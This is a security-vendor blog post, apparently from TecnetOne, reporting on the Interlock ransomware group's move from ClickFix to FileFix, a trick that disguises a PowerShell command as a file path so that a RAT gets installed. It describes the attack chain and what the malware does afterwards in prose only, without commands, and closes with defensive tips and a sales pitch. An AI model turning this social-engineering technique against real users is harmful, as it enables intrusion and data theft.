Ransomware Interlock Adopts FileFix Method to Distribute Malware

The Interlock ransomware group is stepping up its game. They are now using a new tactic called FileFix in their attacks, and it's not exactly for fixing files. This technique allows them to sneak a remote access Trojan (RAT) into infected systems, giving them full control over the victim machines.

In recent months, there has been a sharp increase in Interlock's activities. The reason? The group behind this ransomware has started using a web injector called KongTuke (also known as LandUpdate808), which allows them to distribute malware through previously compromised websites.

This new approach has not gone unnoticed. Researchers at The DFIR Report and Proofpoint detected in May that compromised sites were asking users to complete a fake CAPTCHA verification.

After that, they were instructed to automatically paste text (copied in the background) into the Windows Run window. This trick is part of a technique known as ClickFix, a form of attack that seeks to trick the user into executing malicious code without realizing it.

The evolution of Interlock: From PowerShell to FileFix as an attack method

The deception is no small matter: it leads users to unknowingly execute a PowerShell script, which downloads and launches a Node.js-based version of Interlock RAT. In other words, attackers gain full access with a single click.

But the story doesn't end there. In June, researchers discovered another variant, this time written in PHP, which was also being actively used. How was it distributed? Through the same malicious web injector, KongTuke.

Most interesting (and worrying) is that, earlier this month, a significant change was detected in the way Interlock delivers its malware. They have now fully adopted a variation of the ClickFix attack, known as FileFix, making it their new favorite method for infecting their victims.

FileFix: The new social engineering tactic used by cyberattackers

FileFix is a relatively new technique in the social engineering arsenal, and it is rapidly gaining ground. Derived from an earlier method called ClickFix, this variation has evolved into one of the most widely used ways to distribute malware silently, deceptively, and surprisingly effectively.

How does FileFix work?

The key to FileFix lies in its ability to leverage the Windows interface, using familiar elements such as File Explorer or .HTA (HTML applications) files. Instead of relying on suspicious attachments or links, the attacker gains the user's trust by mimicking a seemingly legitimate action.

The trick is simple but ingenious: the user is asked to “open a file” by pasting what appears to be a path into the File Explorer address bar. In reality, that string is a disguised PowerShell command, which uses comment syntax to appear harmless. When executed, it initiates a malware download without the user's knowledge, and without Windows issuing any security alerts.

Interlock and FileFix: A dangerous combination

In recent attacks linked to Interlock ransomware, cybercriminals have adopted this technique to infect devices without raising suspicion. The process is as follows:

1. The victim is shown a message indicating that they need to “repair” or “access” a file.

2. They are asked to paste a supposed file path into Explorer.

3. That path actually executes a hidden command that downloads a remote access tool (RAT) from trycloudflare.com, disguised as legitimate traffic.

4. The system is compromised and the collection of sensitive data begins.

Interlock FileFix Attack (Source: DFIR Report)

Read more: Hackers Test ClickFix Attacks against Targets on Linux and macOS

What does the malware do once it's inside?

Once the PHP-based RAT is executed, it begins collecting all kinds of information about the system and network. It uses PowerShell commands to perform internal reconnaissance: network data, hardware details, active services, and more. It packages all of this in structured JSON format and discreetly sends it to the server controlled by the attacker.

Signs of manual activity by the attackers have also been observed. This includes:

1. Exploring local directories.

2. Searching for backups.

3. Analyzing domain controllers.

4. Enumerating environments such as Active Directory.

5. Lateral movement through tools such as RDP (Remote Desktop).

All of this allows them to expand their control and plan the next stage of the attack.

Full control from the C2 server

Once the connection to the command and control (C2) server is established, the attacker can:

1. Execute commands on the infected machine as if they were sitting in front of it.

2. Install new malicious payloads.

3. Establish persistence through registry keys.

4. Maintain access even if the system is rebooted.

5. Expand to other computers on the internal network.

Interlock: Evolving ransomware

Interlock was first detected in September 2024, and since then it has been gaining notoriety. Its victims include high-profile organizations such as Texas Tech University, DaVita, and Kettering Health.

In its early stages, Interlock used techniques such as ClickFix to enter systems. However, the move to FileFix demonstrates a clear evolution: the attacker is seeking increasingly stealthy, deceptive, and effective methods.

This change in tactics also marks an important point in the evolution of social engineering applied to malware: it is no longer just a matter of deceiving users with fake emails, but of getting the user to execute the code without knowing it.

Why should you care about FileFix?

This is the first time that the use of FileFix in real attacks has been publicly confirmed. It is a clear sign that threat groups are testing and adopting this tactic, and it won't be long before others start imitating it.

As more malicious actors discover its effectiveness, FileFix is likely to become a common technique in many attack chains, especially in campaigns targeting less technical users or teams with lax security measures.

How to protect yourself from FileFix attacks and other similar threats

1. Be wary of unusual instructions, especially if they involve copying and pasting commands.

2. Do not execute paths or code that you do not understand, even if they come from supposedly trusted sources.

3. Update your systems and use advanced security solutions that detect suspicious behavior beyond simple virus signatures.

4. Educate your teams, because social engineering does not attack systems, it attacks people.

Read more: How to detect and respond to a ransomware attack with TecnetProtect

Conclusion

Interlock ransomware and its new FileFix tactic demonstrate how cyberattacks continue to evolve, becoming increasingly difficult to detect. These types of threats no longer rely solely on technical vulnerabilities, but also leverage social engineering to manipulate users and execute malicious code without raising suspicion.

Given this scenario, traditional solutions are no longer sufficient. Companies need a solid defense strategy that combines advanced technology, real-time monitoring, and ongoing training for their teams. This is where tools such as the following come into play:

1. A Security Operations Center (SOC) for 24/7 active surveillance.

2. XDR solutions that integrate visibility and detection across multiple layers.

3. EDR technology, which allows you to act quickly in response to anomalous behavior on endpoints.

4. And cybersecurity awareness programs, which prepare staff to identify and avoid deception-based threats.

At TecnetOne, we offer each of these solutions and more. We help companies of all sizes protect their digital assets, minimize risks, and respond effectively to incidents. Our approach combines cutting-edge technology with a team of cybersecurity specialists, ready to help you prevent attacks like those on Interlock before they can affect your operations.

Security is not optional. If you want to stay ahead of attackers, contact us. At TecnetOne, we are ready to be your strategic ally in cybersecurity.